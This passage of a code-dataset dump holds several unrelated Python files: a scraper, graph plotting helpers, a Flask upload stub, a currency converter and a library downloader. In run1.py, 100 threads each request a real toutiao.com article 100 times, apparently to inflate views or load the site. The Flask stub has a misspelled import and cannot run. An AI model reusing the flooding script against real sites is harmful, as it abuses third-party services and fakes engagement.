urllib\n\nurlStr = 'https://www.toutiao.com/i6537157013078540814/' #执行网址\nthreadCount = 100 #线程数量\nthreadColumn = 100 #每个线程执行次数\n\nclass MyThread(Thread):\n def __init__(self,name):\n Thread.__init__(self)\n self.name = name\n\n def run(self):\n for i in range(0, threadColumn):\n res = urllib.urlopen(urlStr)\n print('subThread ',self.name,' Start:It is',str(i),'time open:', datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'))\n\nprint('mainThread Start:',datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'))\nfor i in range(0,threadCount):\n threadTmp = MyThread(str(i))\n threadTmp.start()","sub_path":"run1.py","file_name":"run1.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"71429265","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport csv\nimport re\n\n\ndriver = webdriver.Chrome()\n# Go to the computer books page \ndriver.get(\"https://www.barnesandnoble.com/b/textbooks/computers/artificial-intelligence-ai/_/N-8q9Zuv9\")\n\n\n# Find the total number of pages \nt = driver.find_element_by_xpath('//div[@class=\"text--middle\"]').text\nprint(t)\none, per_page, total = map(lambda x: int(x), re.findall('\\d+', t))\nnumber_pages = total // per_page\nprint(one, per_page, total)\nnum_urls = ['https://www.barnesandnoble.com/b/textbooks/computers/artificial-intelligence-ai/_/N-8q9Zuv9?Nrpp=20&page={}'.format(x) for x in range(1,number_pages+1)]\nprint(len(num_urls))\n\ncsv_file = open('ratingsAI.csv', 'w', encoding='utf-8')\nwriter = csv.writer(csv_file)\n\nfor url in num_urls[:50]:\n\tprint(url)\n\trating_dict = {}\n\tdriver.get(url)\n\tdetail_links = driver.find_elements_by_xpath('//div[@class=\"product-shelf-title product-info-title pt-xs\"]/a')\n\tratings_loop = driver.find_elements_by_xpath('//div[@class=\"product-shelf-ratings\"]')\n\tprice_loop = driver.find_elements_by_xpath('//div[@class=\"product-shelf-pricing\"]/div/a/span[2]')\n\tbook_urls = []\n\tratings_list = []\n\tprice_list = []\n\n\tfor link in detail_links:\n\t\tvalue = (link.get_attribute(\"href\"))\n\t\tbook_urls.append(value)\n\t\t\n\n\tfor loop in ratings_loop:\n\t\trating = (loop.get_attribute(\"aria-label\"))\n\t\tratings_list.append(rating)\t\n\t\n\n\tfor loop in price_loop:\n\t\tprice = loop.text #(loop.find_element_by_tag_name('span'))\n\t\tprice_list.append(price)\t\n\n\tfor i in range(len(book_urls)):\n\t\tisbn = re.search('(\\d+$)', book_urls[i] ).group(1)\n\t\tISBN13 = int(isbn)\n\t\trating_dict[\"ISBN13\"] = ISBN13\n\n\t\tratings = re.search('(\\d+\\.\\d+)', ratings_list[i])\n\t\trating_dict[\"RATINGS\"] = ratings.group(1)\n\t\tprices = re.search('(\\d+\\.\\d+)', price_list[i])\n\t\trating_dict[\"PRICE\"] = float(prices.group(1))\n\n\t\twriter.writerow(rating_dict.values())\n\t\n\ncsv_file.close()\ndriver.close()\n\n\n\n","sub_path":"barnes_AI_starter.py","file_name":"barnes_AI_starter.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"210867484","text":"import numpy as np\nimport networkx as nx\nfrom itertools import product\n\n\n# Global variables\nDEPOT, SUPPLY, DELIVERY = \"Depot\", \"S\", \"D\"\nBLUE, GREEN, RED, BLACK = \"blue\", \"green\", \"red\", \"black\"\n\n\ndef get_label(instance, i: int):\n \"\"\"\n Returns the label of a specified index of a model\n :param instance: instance object\n :param i:\n :return:\n \"\"\"\n if i == 0:\n return DEPOT\n if 0 < i <= instance.model_input.num_scooters:\n return SUPPLY\n else:\n return DELIVERY\n\n\ndef create_node_dict(instance):\n output = {}\n locations = (\n [instance.depot]\n + list(zip(instance.scooters[\"lat\"], instance.scooters[\"lon\"]))\n + list(zip(instance.delivery_nodes[\"lat\"], instance.delivery_nodes[\"lon\"]))\n )\n for i, index in enumerate(locations):\n output[index] = {\"label\": get_label(instance, i)}\n return output\n\n\ndef make_graph(nodes: dict, bound):\n \"\"\"\n Creates a networkx graph of the input nodes. Adds label to the nodes\n :param nodes: dictionary of nodes [lat, lon]: \"label\"\n :return: networkx graph, list of node labels, list of nodes border color, list of nodes color\n \"\"\"\n # Converts geographical coordinates to cartesian with lim [0,1] for visualization reasons\n nodes = convert_geographic_to_cart(nodes, bound)\n\n # make graph object\n graph = nx.DiGraph()\n graph.add_nodes_from([i for i in range(len(nodes.keys()))])\n\n # set node label and position in graph\n labels = {}\n node_color = []\n node_border = []\n for i, p in enumerate(nodes.keys()):\n label = nodes[p][\"label\"]\n if label == DEPOT:\n labels[i] = DELIVERY\n node_color.append(BLUE)\n node_border.append(BLACK)\n elif label == SUPPLY:\n labels[i] = i\n node_color.append(GREEN)\n node_border.append(BLACK)\n elif label == DELIVERY:\n labels[i] = i\n node_color.append(RED)\n node_border.append(BLACK)\n\n graph.nodes[i][\"pos\"] = p\n\n return graph, labels, node_border, node_color\n\n\ndef add_vehicle_node_info(instance, ax):\n \"\"\"\n Function to add information about vehicles for the first plot\n :param instance: Instance object for a given solution\n :param ax: Subplot to plot the information\n :return: Colors corresponding to vehicles used to color edges\n \"\"\"\n # generate random colors for vehicle routs\n np.random.seed(10)\n colors = [\n \"#%06X\" % np.random.randint(0, 0xFFFFFF)\n for i in range(instance.model_input.num_service_vehicles)\n ]\n\n (\n num_of_service_vehicles,\n service_vehicles_scooter_cap,\n service_vehicles_battery_cap,\n ) = instance.service_vehicles\n\n # adding vehicle color description\n for i in range(len(colors)):\n s = f\"Vehicle {(i + 1)}\"\n ax.text(\n 0,\n 1 - 0.03 * i,\n s,\n transform=ax.transAxes,\n c=colors[i],\n fontsize=10,\n weight=\"bold\",\n horizontalalignment=\"left\",\n verticalalignment=\"top\",\n )\n\n # vehicle info box\n cons = (\n f\"Vehicle constraint:\\nTime = %d h %d m \\n\\nCar capacity:\\nBattery = %d \\nScooters = %d\"\n % (\n int(instance.model.get_parameters().shift_duration / 60),\n instance.model.get_parameters().shift_duration % 60,\n service_vehicles_battery_cap,\n service_vehicles_scooter_cap,\n )\n )\n\n props = dict(boxstyle=\"round\", facecolor=\"wheat\", pad=0.5, alpha=0.5)\n\n # place a text box in upper left in axes coords\n ax.text(\n 0,\n 1 - 0.03 * (len(colors) + 1),\n cons,\n transform=ax.transAxes,\n fontsize=10,\n horizontalalignment=\"left\",\n verticalalignment=\"top\",\n bbox=props,\n )\n\n return colors\n\n\ndef display_edge_plot(instance, ax, s_edge_labels={}):\n \"\"\"\n Function to display second plot of edges not included in solution\n :param instance: Instance object for a given solution\n :param s_edge_labels: Dictionary of edges used in solution, default empty for infeasible solutions\n :param ax: Subplot\n \"\"\"\n\n ax.axis(\"off\")\n # draw nodes\n node_dict = create_node_dict(instance)\n graph, labels, node_border, node_color = make_graph(node_dict, instance.bound)\n\n edge_labels = {}\n\n # check to handle infeasible models\n if instance.is_feasible():\n # draw edges and set label (time cost and inventory)\n for x in instance.model.x:\n from_node, to_node, vehicle_id = x\n if instance.model.x[x].x == 0:\n if (\n from_node != to_node\n and not s_edge_labels.keys().__contains__((from_node, to_node))\n and not s_edge_labels.keys().__contains__((to_node, from_node))\n ):\n graph.add_edge(from_node, to_node, color=\"grey\", width=1, alpha=0.2)\n edge_labels[(from_node, to_node)] = \"t = \" + str(\n round(\n instance.model.get_parameters().time_cost[\n (from_node, to_node)\n ],\n 2,\n )\n )\n else:\n for x in instance.model.x:\n from_node, to_node, vehicle_id = x\n if (\n vehicle_id == 0\n and instance.model.get_parameters().time_cost[(from_node, to_node)] > 0\n ):\n graph.add_edge(from_node, to_node, color=\"grey\", width=1, alpha=0.2)\n edge_labels[(from_node, to_node)] = \"t = \" + str(\n round(\n instance.model.get_parameters().time_cost[(from_node, to_node)],\n 2,\n )\n )\n\n edges = graph.edges()\n e_colors = [graph[u][v][\"color\"] for u, v in edges]\n e_weights = [graph[u][v][\"width\"] for u, v in edges]\n\n pos = nx.get_node_attributes(graph, \"pos\")\n\n # draw graph\n edges = nx.draw_networkx_edges(\n graph, pos, edge_color=e_colors, width=e_weights, node_size=1, ax=ax,\n )\n nx.draw_networkx_labels(graph, pos, labels, font_size=1, font_color=\"w\", ax=ax)\n nx.draw_networkx_edge_labels(graph, pos, edge_labels=edge_labels, ax=ax)\n\n for e in edges:\n e.set_linestyle(\"dashed\")\n\n\ndef convert_geographic_to_cart(nodes, bound):\n \"\"\"\n Function to convert geographical coordinates to cartesian\n :param nodes: Dictionary of nodes [lat,lon]: type\n :return: Dictionary of nodes [cart_x, cart_y]: type\n \"\"\"\n lat_min, lat_max, lon_min, lon_max = bound\n delta_lat = lat_max - lat_min\n delta_lon = lon_max - lon_min\n zero_lat = lat_min / delta_lat\n zero_lon = lon_min / delta_lon\n\n output = {}\n\n for i, j in nodes.keys():\n key = ((j / delta_lon - zero_lon), (i / delta_lat - zero_lat))\n output[key] = nodes[(i, j)]\n\n return output\n\n\ndef add_zones(number_of_zones, ax):\n \"\"\"\n Function to add zones to solution plot\n :param number_of_zones: int - number of per axis\n :param ax: subplot\n \"\"\"\n axis_interval = float(1 / number_of_zones)\n xy = list(\n product(\n np.arange(axis_interval, 1, axis_interval),\n np.arange(axis_interval, 1, axis_interval),\n )\n )\n for x, y in xy:\n ax.axhline(x, xmax=0.93, color=\"black\")\n ax.axvline(y, ymax=0.98, color=\"black\")\n","sub_path":"project_thesis/visualization/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"12859741","text":"from flask import Flask, requset\napp = Flask(__name__)\n\n\n@app.route('/upload', methods=['GET','POST'])\ndef upload_file():\n if requset.method=='POST':\n f = requset.files['the_file']\n f.save('/var/www/uploads/upload_file.txt')\n\nif __name__ == '__main__':\n app.run(debug=True) \n ","sub_path":"quickstart/AccessingRequsetData/FileUpload.py","file_name":"FileUpload.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"457223994","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import with_statement, print_function, division\n\nimport sys\nimport os.path as op\nfrom functools import wraps\nimport datetime\nfrom datetime import timedelta\nfrom collections import defaultdict, namedtuple\n\n# We could have used \"six\", but like this we have no dependency\nif sys.version_info[0] < 3:\n range = xrange\n from itertools import izip as zip, izip_longest as zip_longest\n\n def iteritems(d):\n return d.iteritems()\n\n def itervalues(d):\n return d.itervalues()\nelse:\n from itertools import zip_longest\n\n def iteritems(d):\n return d.items()\n\n def itervalues(d):\n return d.values()\n\n\n_DIRNAME = op.realpath(op.dirname(__file__))\nCURRENCY_FILE = op.join(_DIRNAME, 'eurofxref-hist.csv')\n\nBounds = namedtuple('Bounds', 'first_date last_date')\n\n__all__ = ['CurrencyConverter',\n 'S3CurrencyConverter',\n 'RateNotFoundError', ]\n\n\ndef memoize(function):\n memo = {}\n\n @wraps(function)\n def wrapper(*args):\n if args not in memo:\n memo[args] = function(*args)\n return memo[args]\n return wrapper\n\n\n@memoize\ndef list_dates_between(first_date, last_date):\n \"\"\"Returns all dates from first to last included.\"\"\"\n return [first_date + timedelta(days=n)\n for n in range(1 + (last_date - first_date).days)]\n\n\n@memoize\ndef parse_date(s):\n \"\"\"Fast %Y-%m-%d parsing.\"\"\"\n return datetime.date(int(s[:4]), int(s[5:7]), int(s[8:10]))\n\n\nclass RateNotFoundError(Exception):\n \"\"\"Custom exception when data is missing in the rates file.\"\"\"\n pass\n\n\nclass CurrencyConverter(object):\n \"\"\"\n At init, load the historic currencies (since 1999) from the ECB.\n The rates are EUR foreign exchange reference rates:\n\n Date,USD,JPY,BGN,CYP,CZK,...\n 2014-03-28,1.3759,140.9,1.9558,N/A,27.423,...\n 2014-03-27,1.3758,...\n\n ``_rates`` is a dictionary with:\n + currencies as keys\n + {date: rate, ...} as values.\n\n ``currencies`` is a set of all available currencies.\n ``bounds`` is a dict if first and last date available per currency.\n \"\"\"\n def __init__(self,\n currency_file=CURRENCY_FILE,\n fallback_on_wrong_date=False,\n fallback_on_missing_rate=False,\n ref_currency='EUR',\n na_values=frozenset(['', 'N/A']),\n verbose=False):\n\n # Global options\n self.fallback_on_wrong_date = fallback_on_wrong_date\n self.fallback_on_missing_rate = fallback_on_missing_rate\n self.ref_currency = ref_currency # reference currency of rates\n self.na_values = na_values # missing values\n self.verbose = verbose\n\n # Will be filled once the file is loaded\n self._rates = None\n self.bounds = None\n self.currencies = None\n\n if currency_file is not None:\n self._load_file(currency_file)\n\n def _load_file(self, currency_file):\n \"\"\"To be subclassed if alternate methods of loading data.\"\"\"\n with open(currency_file) as lines:\n self._load_lines(lines)\n\n def _load_lines(self, lines):\n _rates = self._rates = defaultdict(dict)\n na_values = self.na_values\n\n header = next(lines).strip().split(',')[1:]\n\n for line in lines:\n line = line.strip().split(',')\n date = parse_date(line[0])\n for currency, rate in zip(header, line[1:]):\n if rate not in na_values and currency: # skip empty currency\n _rates[currency][date] = float(rate)\n\n self.currencies = set(self._rates) | set([self.ref_currency])\n self._compute_bounds()\n\n for currency in sorted(self._rates):\n self._set_missing_to_none(currency)\n if self.fallback_on_missing_rate:\n self._compute_missing_rates(currency)\n\n def _compute_bounds(self):\n self.bounds = dict((currency, Bounds(min(r), max(r)))\n for currency, r in iteritems(self._rates))\n\n self.bounds[self.ref_currency] = Bounds(\n min(b.first_date for b in itervalues(self.bounds)),\n max(b.last_date for b in itervalues(self.bounds)))\n\n def _set_missing_to_none(self, currency):\n \"\"\"Fill missing rates of a currency with the closest available ones.\"\"\"\n rates = self._rates[currency]\n first_date, last_date = self.bounds[currency]\n\n for date in list_dates_between(first_date, last_date):\n if date not in rates:\n rates[date] = None\n\n if self.verbose:\n missing = len([r for r in itervalues(rates) if r is None])\n if missing:\n print('{0}: {1} missing rates from {2} to {3} ({4} days)'.format(\n currency, missing, first_date, last_date,\n 1 + (last_date - first_date).days))\n\n def _compute_missing_rates(self, currency):\n \"\"\"Fill missing rates of a currency with the closest available ones.\"\"\"\n rates = self._rates[currency]\n\n # tmp will store the closest rates forward and backward\n tmp = defaultdict(lambda: [None, None])\n\n for date in sorted(rates):\n rate = rates[date]\n if rate is not None:\n closest_rate = rate\n dist = 0\n else:\n dist += 1\n tmp[date][0] = closest_rate, dist\n\n for date in sorted(rates, reverse=True):\n rate = rates[date]\n if rate is not None:\n closest_rate = rate\n dist = 0\n else:\n dist += 1\n tmp[date][1] = closest_rate, dist\n\n for date in sorted(tmp):\n (r0, d0), (r1, d1) = tmp[date]\n rates[date] = (r0 * d1 + r1 * d0) / (d0 + d1)\n if self.verbose:\n print(('{0}: filling {1} missing rate using {2} ({3}d old) and '\n '{4} ({5}d later)').format(currency, date, r0, d0, r1, d1))\n\n def _get_rate(self, currency, date):\n \"\"\"Get a rate for a given currency and date.\n\n :type date: datetime.date\n\n >>> from datetime import date\n >>> c = CurrencyConverter()\n >>> c._get_rate('USD', date=date(2014, 3, 28))\n 1.375...\n >>> c._get_rate('BGN', date=date(2010, 11, 21))\n Traceback (most recent call last):\n RateNotFoundError: BGN has no rate for 2010-11-21\n \"\"\"\n if currency == self.ref_currency:\n return 1.0\n\n if date not in self._rates[currency]:\n first_date, last_date = self.bounds[currency]\n\n if not self.fallback_on_wrong_date:\n raise RateNotFoundError('{0} not in {1} bounds {2}/{3}'.format(\n date, currency, first_date, last_date))\n\n if date < first_date:\n fallback_date = first_date\n elif date > last_date:\n fallback_date = last_date\n else:\n raise AssertionError('Should never happen, bug in the code!')\n\n if self.verbose:\n print(r'/!\\ {0} not in {1} bounds {2}/{3}, falling back to {4}'.format(\n date, currency, first_date, last_date, fallback_date))\n\n date = fallback_date\n\n rate = self._rates[currency][date]\n if rate is None:\n raise RateNotFoundError('{0} has no rate for {1}'.format(currency, date))\n return rate\n\n def convert(self, amount, currency, new_currency='EUR', date=None):\n \"\"\"Convert amount from a currency to another one.\n\n :type date: datetime.date\n\n >>> from datetime import date\n >>> c = CurrencyConverter()\n >>> c.convert(100, 'EUR', 'USD', date=date(2014, 3, 28))\n 137.5...\n >>> c.convert(100, 'USD', date=date(2014, 3, 28))\n 72.67...\n >>> c.convert(100, 'BGN', date=date(2010, 11, 21))\n Traceback (most recent call last):\n RateNotFoundError: BGN has no rate for 2010-11-21\n \"\"\"\n # ref_currency is in self.currencies\n if currency not in self.currencies:\n raise ValueError('{0} is not a supported currency'.format(currency))\n\n if date is None:\n date = self.bounds[currency].last_date\n else:\n try:\n date = date.date() # fallback if input was a datetime object\n except AttributeError:\n pass\n\n r0 = self._get_rate(currency, date)\n r1 = self._get_rate(new_currency, date)\n\n return float(amount) / r0 * r1\n\n\nclass S3CurrencyConverter(CurrencyConverter):\n \"\"\"\n Load the ECB CSV file from an S3 key instead of from a local file.\n The first argument should be an instance of boto.s3.key.Key (or any other\n object that provides a get_contents_as_string() method which returns the\n CSV file as a string).\n \"\"\"\n def __init__(self, currency_file, **kwargs):\n \"\"\"Make currency_file a required attribute\"\"\"\n super(S3CurrencyConverter, self).__init__(currency_file, **kwargs)\n\n def _load_file(self, currency_file):\n lines = currency_file.get_contents_as_string().splitlines()\n self._load_lines(lines)\n\n\ndef grouper(iterable, n, fillvalue=None):\n \"\"\"Group iterable by n elements.\n\n >>> grouper('abcdefg', 3, fillvalue='x')\n [('a', 'b', 'c'), ('d', 'e', 'f'), ('g', 'x', 'x')]\n \"\"\"\n return list(zip_longest(*[iter(iterable)] * n, fillvalue=fillvalue))\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('amount', type=float)\n parser.add_argument('currency')\n\n parser.add_argument(\n '-t', '--to',\n help='target currency, default is %(default)s',\n default='EUR')\n\n parser.add_argument(\n '-d', '--date',\n help='date of rate, with format %%Y-%%m-%%d',\n default=None)\n\n parser.add_argument(\n '-v', '--verbose',\n help=('display available currencies, use twice (-vv) to '\n 'also display details of missing rates completion'),\n action='count',\n default=0)\n\n parser.add_argument(\n '-f', '--file',\n help='change currency file used, default is %(default)s',\n default=CURRENCY_FILE)\n\n args = parser.parse_args()\n\n c = CurrencyConverter(currency_file=args.file,\n fallback_on_wrong_date=True,\n fallback_on_missing_rate=True,\n verbose=args.verbose > 1)\n currencies = sorted(c.currencies)\n\n if args.verbose:\n print('{0} available currencies:'.format(len(currencies)))\n for group in grouper(currencies, 10, fillvalue=''):\n print(' '.join(group))\n print()\n\n currencies.sort(key=lambda u: c.bounds[u].last_date, reverse=True)\n currencies.sort(key=lambda u: c.bounds[u].first_date)\n for currency in currencies:\n first_date, last_date = c.bounds[currency]\n print('{0}: from {1} to {2} ({3} days)'.format(\n currency, first_date, last_date,\n 1 + (last_date - first_date).days))\n print()\n\n if args.currency not in c.currencies:\n print(r'/!\\ \"{0}\" is not in available currencies:'.format(args.currency))\n for group in grouper(currencies, 10, fillvalue=''):\n print(' '.join(group))\n exit(1)\n\n if args.date is not None:\n date = parse_date(args.date)\n else:\n date = c.bounds[args.currency].last_date\n\n new_amount = c.convert(amount=args.amount,\n currency=args.currency,\n new_currency=args.to,\n date=date)\n\n print('{0:.3f} {1} = {2:.3f} {3} on {4}'.format(\n args.amount,\n args.currency,\n new_amount,\n args.to,\n date))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"currency_converter/currency_converter.py","file_name":"currency_converter.py","file_ext":"py","file_size_in_byte":11941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"74658924","text":"#!/usr/bin/python3\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\r\nimport requests, time, os, regex#, sys, codecs, re\r\n\r\ndef main():\r\n\tscale = 1 #scale of images (1 = 100%, 2 = 50%, 4 = 25%, 8 = 12.5%, 16 = 6.25%, 32 = 3.125%)\r\n\twaittime = 30 #wait interval between downloads; must be set to at least 30 or IP will be blocked (as of 2014.09.29)\r\n\tjpglimit = 1 #number of simultaneous jpg downloads; currently can't go higher than 1 (as of 2014.09.29)\r\n\tpdflimit = 50 #number of simultaneous pdf page downloads; currently can't go higher than 20 (as of 2014.09.29)\r\n\tbook_ids = []\r\n\turllist = \"ndl_urls.txt\" #file to read urls from\r\n\twith open(urllist, \"r\") as f:\r\n\t\tfor line in f:\r\n\t\t\turl = line.strip()\r\n\t\t\tif url[:35] == \"http://dl.ndl.go.jp/info:ndljp/pid/\":\r\n\t\t\t\tbook_ids.append(url.split(\"/\")[-1])\r\n\t\t\telse:\r\n\t\t\t\tprint(u\"{0} is not a valid url. Please correct the url and try again.\".format(url))\r\n\t\t\t\treturn()\r\n\t\t\tf.closed\r\n\tprint(u\"Choose one of the following options:\")\r\n\tprint(u\"1. Download as jpgs (better quality but much longer download time).\\n2. Download as pdf (lower quality but much shorter download time).\")\r\n\twhile True:\r\n\t\tdownloadmode = input()\r\n\t\tif downloadmode == \"1\": break\r\n\t\telif downloadmode == \"2\": break\r\n\t\telse: print(u\"Invalid input! Input 1 or 2.\")\r\n\tif downloadmode == \"1\": downloadlimit = jpglimit\r\n\telif downloadmode == \"2\": downloadlimit = pdflimit\r\n\tif estimate(book_ids, waittime, downloadmode, downloadlimit):\r\n\t\tfor i in book_ids:\r\n\t\t\turl = \"http://dl.ndl.go.jp/info:ndljp/pid/{}\".format(i)\r\n\t\t\tsoup = BeautifulSoup(requests.get(url).text)\r\n\t\t\ttitle, volume, fulltitle = gettitle(soup)\r\n\t\t\tpage, lastpage = getpages(soup)\r\n\t\t\ttry:\r\n\t\t\t\tos.makedirs(fulltitle, exist_ok=False)\r\n\t\t\texcept OSError:\r\n\t\t\t\tprint(\"Directory \\\"{0}\\\" already exists.\\nProceed anyway and overwrite contents?\".format(fulltitle))\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tchoice = input()\r\n\t\t\t\t\tif choice == \"y\" or choice == \"Y\" or choice == \"yes\" or choice == \"YES\": break\r\n\t\t\t\t\telif choice == \"n\" or choice == \"N\" or choice == \"no\" or choice == \"NO\": return\r\n\t\t\t\t\telse: print(u\"Invalid input! Input yes or no.\")\r\n\t\t\tos.chdir(fulltitle)\r\n\t\t\tif downloadmode == \"1\":\tgetjpgs(fulltitle, page, lastpage, i, scale, waittime, downloadlimit) #download volume as jpgs\r\n\t\t\telif downloadmode == \"2\": getpdfs(fulltitle, page, lastpage, i, scale, waittime, downloadlimit) #download volume as pdf\r\n\t\t\tos.chdir(\"..\")\r\n\r\ndef gettitle(soup): #get title and volume of book\r\n\tif soup.find(\"dt\",text=u\"タイトル (title)\"):#get title\r\n\t\ttitle = soup.find(\"dt\",text=u\"タイトル (title)\").findNext(\"dd\").contents[0].lstrip()\r\n\t\ttitle = replacebadchars(title) #only needed in Windows\r\n\telse:\r\n\t\ttitle = \"No.Title\"\r\n\tif soup.find(\"dt\",text=u\"著者 (creator)\"):#get author\r\n\t\tauthor = soup.find(\"dt\",text=u\"著者 (creator)\").findNext(\"dd\").contents[0].lstrip()\r\n\t\tauthor = regex.sub(r\"\\s+\", \"\", author)\r\n\t\tif author[-1:] == \"著\": author = author[:-1]\r\n\t\tauthor = replacebadchars(author) #only needed in Windows\r\n\telse:\r\n\t\tauthor = \"Unknown\"\r\n\tif soup.find(\"dt\",text=u\"出版年月日(W3CDTF形式) (issued:W3CDTF)\"):#get date of publication\r\n\t\tdate = soup.find(\"dt\",text=u\"出版年月日(W3CDTF形式) (issued:W3CDTF)\").findNext(\"dd\").contents[0].lstrip()\r\n\t\tdate = replacebadchars(date) #only needed in Windows\r\n\telse:\r\n\t\tdate = \"Undated\"\t\r\n\tif soup.find(\"dt\",text=u\"巻次、部編番号 (volume)\"):#get name of volume (if applicable)\r\n\t\tvolume = soup.find(\"dt\",text=u\"巻次、部編番号 (volume)\").findNext(\"dd\").contents[0].lstrip()\r\n\t\tvolume = replacebadchars(volume) #only needed in Windows\r\n\t\tfulltitle = \"{0} ({1}) {2}, {3}\".format(author, date, title, volume) #format of fulltitle with volume information\r\n\telse:\r\n\t\tvolume = \"\"\r\n\t\tfulltitle = \"{0} ({1}) {2}\".format(author, date, title) #format of fulltitle without volume information\r\n\treturn(title, volume, fulltitle)\r\n\r\ndef replacebadchars(string): #necessary if running in Windows\r\n\t#for s in string: print(s, s.encode(\"unicode_escape\"))\r\n\tbadchars = [r\"\\\\\", r\"\\/\", r\"\\:\", r\"\\*\", r\"\\?\", r\"\\\"\", r\"\\<\", r\"\\>\", r\"\\|\"]\r\n\tgoodchars = [\"\\", \"/\", \":\", \"*\", \"?\", \"”\", \"<\", \">\", \"|\"]\r\n\tfor bad in badchars:\r\n\t\tstring = regex.sub(bad, goodchars[badchars.index(bad)], string)\r\n\t#replace fullwidth numbers and punctuation with halfwidth (comment out next 4 lines if not desired)\r\n\tfullnums = [r\"1\", r\"2\", r\"3\", r\"4\", r\"5\", r\"6\", r\"7\", r\"8\", r\"9\", r\"0\", u\"\\u2212\", r\"[.。]\", r\"[、,]\", r\"(\", r\")\", r\"[\", r\"]\"]\r\n\thalfnums = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"0\", \"-\", \".\", \",\", \"(\", \")\", r\"[\", r\"]\"]\r\n\tfor num in fullnums:\r\n\t\tstring = regex.sub(num, halfnums[fullnums.index(num)], string)\r\n\t#remove all whitespace (comment out next line if not desired)\r\n\tstring = regex.sub(r\"\\s\", \"\", string)\r\n\t#remove 著 after the author's name\r\n\tstring = regex.sub(r\"著\", \"\", string)\r\n\treturn(string)\r\n\r\ndef getpages(soup): #get first and last page of volume\r\n\tpage = 1 #starting page\r\n\tlastpage = 0 #set last page manually here (set to 0 to find last page automatically)\r\n\tif lastpage == 0:\r\n\t\tif soup.find(\"input\", {\"name\":\"lastContentNo\"}):\r\n\t\t\tlastpage = int(soup.find(\"input\", {\"name\":\"lastContentNo\"})[\"value\"]) #find last page automatically\r\n\treturn(page, lastpage)\r\n\r\ndef getjpgs(fulltitle, page, lastpage, book_id, scale, waittime, downloadlimit): #download book\r\n\twhile page <= lastpage:\r\n\t\tfor i in range(0, downloadlimit):\r\n\t\t\tif page < 10:\r\n\t\t\t\t#filename = u\"{0}_000{1}.jpg\".format(fulltitle, page) #full filename\r\n\t\t\t\tfilename = \"000{}.jpg\".format(page) #page number only\r\n\t\t\telif page < 100:\r\n\t\t\t\t#filename = u\"{0}_00{1}.jpg\".format(fulltitle, page) #full filename\r\n\t\t\t\tfilename = \"00{}.jpg\".format(page) #page number only\r\n\t\t\telse:\r\n\t\t\t\t#filename = u\"{0}_0{1}.jpg\".format(fulltitle, page) #full filename\r\n\t\t\t\tfilename = \"0{}.jpg\".format(page) #page number only\r\n\t\t\tprint(u\"Now downloading page {0} of {1} of {2}.\".format(page, lastpage, fulltitle))\r\n\t\t\t#print(u\"Now downloading page {0} of {1}.\".format(page, lastpage)) #for ascii Windows console\r\n\t\t\tpayload = {\"itemId\": \"info:ndljp/pid/{}\".format(book_id), \"contentNo\": page, \"outputScale\": scale}\r\n\t\t\twhile True:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tr = requests.get(\"http://dl.ndl.go.jp/view/jpegOutput\", params=payload)\r\n\t\t\t\t\tr.raise_for_status()\r\n\t\t\t\t\tbreak\r\n\t\t\t\texcept requests.exceptions.HTTPError:\r\n\t\t\t\t\tprint(\"Download error. Trying again...\")\r\n\t\t\t\t\ttime.sleep(waittime)\r\n\t\t\twith open(filename, \"wb\") as f:\r\n\t\t\t\tf.write(r.content)\r\n\t\t\t\tf.closed\r\n\t\t\t\tpage = page + 1\r\n\t\ttime.sleep(waittime)\r\n\r\ndef getpdfs(fulltitle, page, lastpage, book_id, scale, waittime, downloadlimit): #download book as pdfs (faster but poorer quality)\r\n\tfilenames = []\r\n\twhile page <= lastpage:\r\n\t\tif lastpage < page + downloadlimit - 1:\r\n\t\t\tlastpdfpage = lastpage\r\n\t\telse:\r\n\t\t\tlastpdfpage = page + downloadlimit - 1\r\n\t\tif page < 10:\r\n\t\t\tif lastpdfpage < 10: filename = u\"{0}_000{1}-000{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\t\telif lastpdfpage < 100: filename = u\"{0}_000{1}-00{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\t\telse: filename = u\"{0}_000{1}-0{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\telif page < 100:\r\n\t\t\tif lastpdfpage < 100: filename = u\"{0}_00{1}-00{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\t\telse: filename = u\"{0}_00{1}-0{2}.pdf\".format(fulltitle, page, lastpdfpage)\t\t\t\r\n\t\telse:\r\n\t\t\tfilename = u\"{0}_0{1}-0{2}.pdf\".format(fulltitle, page, lastpdfpage)\r\n\t\tprint(u\"Now downloading pages {0} to {1} of {2} in {3}.\".format(page, lastpdfpage, lastpage, fulltitle))\r\n\t\t#print(u\"Now downloading pages {0} to {1} of {2}.\".format(page, lastpdfpage, lastpage)) #for ascii Windows console\r\n\t\tpayload = {\"pdfOutputRangeType\": \"R\", \"pdfPageSize\": \"\", \"pdfOutputRanges\": \"{0}-{1}\".format(page, lastpdfpage)}\r\n\t\twhile True:\r\n\t\t\ttry:\r\n\t\t\t\tr = requests.get(\"http://dl.ndl.go.jp/view/pdf/digidepo_{}.pdf\".format(book_id), 